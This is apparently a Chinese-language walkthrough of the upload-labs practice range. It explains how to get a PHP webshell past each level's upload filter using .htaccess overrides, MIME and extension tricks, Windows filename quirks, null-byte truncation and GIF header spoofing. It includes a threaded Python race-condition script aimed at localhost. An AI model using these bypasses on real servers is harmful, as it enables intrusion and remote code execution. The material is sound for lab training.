文件上传漏洞靶场upload-labs练习

下载地址：https://github.com/c0ny1/upload-labs

php版本：推荐5.2.17(其他版本可能会导致部分Pass无法突破)
php组件（扩展）：php_gd2,php_exif（部分Pass需要开启这两个组件）
apache：以moudel方式连接

Pass-01 绕过前端文件后缀检查

由提示可知这是前端文件后缀检查

解法一：

1、写一个一句话木马文件

2、修改文件后缀名为jpg|gif|png

3、上传木马文件，抓包

4、将文件后缀名修改为php,重放这个抓到的包
打开控制台可以看到文件上传的路径

5、用菜刀连上一句话木马文件，获得webshell

解法二：

前端禁用JS，直接上传Webshell
把return checkFile()删了，直接上传php文件，上传成功

Pass-02 绕过服务器对数据包的MIME类型检查

提示：本pass在服务端对数据包的MIME进行检查！

看源码发现他会检验Content-Type: 这个字段，将它改为：

image/jpeg

发现文件上传成功，getshell

pass-03 绕过过滤不严的黑名单检测

黑名单验证，且不能通过大小写方式绕过

解法一：

修改后缀为php3|php5，成功上传文件

解法二：

重写文件解析规则绕过。先上传一个名为.htaccess文件，内容如下：

<FilesMatch "1.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

如何创建.htaccess结尾的无文件名的文件
再上传1.jpg木马文件
tips:
通过.htaccess文件调用php解析器去解析一个文件名中只要包含"1.jpg"这个字符串的任意文件，无论扩展名是什么(没有也行)，都以php的方式来解析

Pass-04 重写文件解析规则/apache解析漏洞实现黑名单的绕过

这些文件后缀名被列入了黑名单，几乎过滤掉了所有脚本文件后缀

“.php”,".php5",".php4",".php3",".php2",".php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".ini"

但是并没有过滤.jpg后缀，在php5.5以前通过.jpg格式可以正常拿shell

解法一：

依然可以使用重写文件解析规则绕过，方法同上题一样，这里不再赘述

解法二：

本关可以利用apache解析漏洞来正常拿webshell
上传一个php文件，然后抓包将后缀名修改成.php.rar
然后连接菜刀获得webshell

Pass-05 apache解析漏洞绕过黑名单检测

这些文件后缀名被列入了黑名单，几乎过滤掉了所有脚本文件后缀,相比上一关多了一个.htaccess

“.php”,".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess"

依旧可以利用apache解析漏洞绕过黑名单检测

Pass-06 文件名后缀大小写混合绕过

分析代码，发现以.htaccess为后缀的文件已经不允许上传，但是 $fil{e}_{e}xt=strtolower($file_ext); //转换为小写 这一句没有了，我们就可以使用文件名后缀大小写混合绕过，把1.php改为1.phP…来上传

Pass-07 Windows系统的文件名特性增加空格和点

代码少了一行去空格

利用Windows系统的文件名特性。文件名最后增加空格和点，写成1.php .，这个需要用burpsuite抓包修改，上传后保存在Windows系统上的文件名最后的一个.会被去掉，实际上保存的文件名就是1.php （末尾有一个空格）

Pass-08 Windows系统的文件名特性增加空格和点

仔细看代码，发现少了一行去掉.的代码
原理同7，利用Windows系统的文件名特性。文件名最后增加空格和点，写成1.php. ，这个需要用burpsuite抓包修改，上传后保存在Windows系统上的文件名最后的一个空格会被去掉，实际上保存的文件名就是1.php.

Pass-09 Windows文件流特性绕过

少了一行 $fil{e}_{e}xt=st{r}_{i}replace(‘::$DATA‘, ‘‘, $file_ext);//去除字符串
我们可以采用Windows文件流特性绕过，文件名改成

2.php::$DATA , 上传成功后保存的文件名其实是2.php

Pass-10 Windows系统的文件名特性增加空格和点

上传文件名后加上点+空格+点，改为1.php. .

Pass-11 双写文件名绕过

分析代码，由于 $fil{e}_{n}ame=st{r}_{i}replace($deny_ext,"", $file_name); 只对文件后缀名进行一次过滤，这样的话，双写文件名绕过，文件名改成1.pphphp

Pass-12 上传路径名%00截断绕过时间戳命名

分析代码，这是以时间戳的方式对上传文件进行命名，使用上传路径名%00截断绕过，不过这需要对文件有足够的权限，比如说创建

文件夹，上传的文件名写成1.jpg, save_path改成…/upload/1.php%00，最后保存下来的文件就是1.php

Pass-13 上传路径0x00绕过

原理同Pass-12，上传路径0x00绕过。利用Burpsuite的Hex功能将save_path改成…/upload/1.php【二进制00】形式

Pass-14 绕过GIF图片检查

解法一：

绕过文件头检查，添加GIF图片的文件头GIF89a，绕过GIF图片检查

解法二：

Pass-15 绕过GIF图片检查

getimagesize() 函数:
用于获取图像尺寸 ，索引 2 给出的是图像的类型，返回的是数字，其中1 = GIF，2 = JPG，3 = PNG，4 = SWF，5 = PSD，6 = BMP，7 = TIFF(intel byte order)，8 = TIFF(motorola byte order)，9 = JPC，10 = JP2，11 = JPX，12 = JB2，13 = SWC，14 = IFF，15 = WBMP，16 = XBM

这里有详解：https://blog.csdn.net/sanbingyutuoniao123/article/details/52166617

image_type_to_extension() 函数:
用于获取图片后缀

解法同pass-14

Pass-16 绕过GIF图片检查

exif_imagetype() 此函数是php内置函数，用来获取图片类型

解法同pass-14

Pass-18 条件竞争删除文件时间差

利用条件竞争删除文件时间差绕过。使用命令pip install hackhttp安装hackhttp模块，运行下面的Python代码即可。如果还是删除太快，可以适当调整线程并发数。

1  #!/usr/bin/env python
 2 # coding:utf-8
 3
 4 
 5 import hackhttp
 6 from multiprocessing.dummy import Pool as ThreadPool
 7 
 8 
 9 def upload(lists):
10     hh = hackhttp.hackhttp()
11     raw = """POST /upload-labs/Pass-17/index.php HTTP/1.1
12 Host: 127.0.0.1
13 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0
14 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
15 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
16 Accept-Encoding: gzip, deflate
17 Referer: http://127.0.0.1/upload-labs/Pass-17/index.php
18 Cookie: pass=17
19 Connection: close
20 Upgrade-Insecure-Requests: 1
21 Content-Type: multipart/form-data; boundary=---------------------------6696274297634
22 Content-Length: 341
23 
24 -----------------------------6696274297634
25 Content-Disposition: form-data; name="upload_file"; filename="17.php"
26 Content-Type: application/octet-stream
27 
28 $_POST["LandGrey"])?>
29 -----------------------------6696274297634
30 Content-Disposition: form-data; name="submit"
31 
32 上传
33 -----------------------------6696274297634--
34 """
35     code, head, html, redirect, log = hh.http(‘http://127.0.0.1/upload-labs/Pass-17/index.php‘, raw=raw)
36     print(str(code) + "\r")
37 
38 
39 pool = ThreadPool(10)
40 pool.map(upload, range(10000))
41 pool.close()
42 pool.join()

在脚本运行的时候，访问Webshell

Pass-19 上传的文件名用0x00绕过

上传的文件名用0x00绕过。改成19.php【二进制00】.1.jpg

部分内容参考：http://www.mamicode.com/info-detail-2325113.html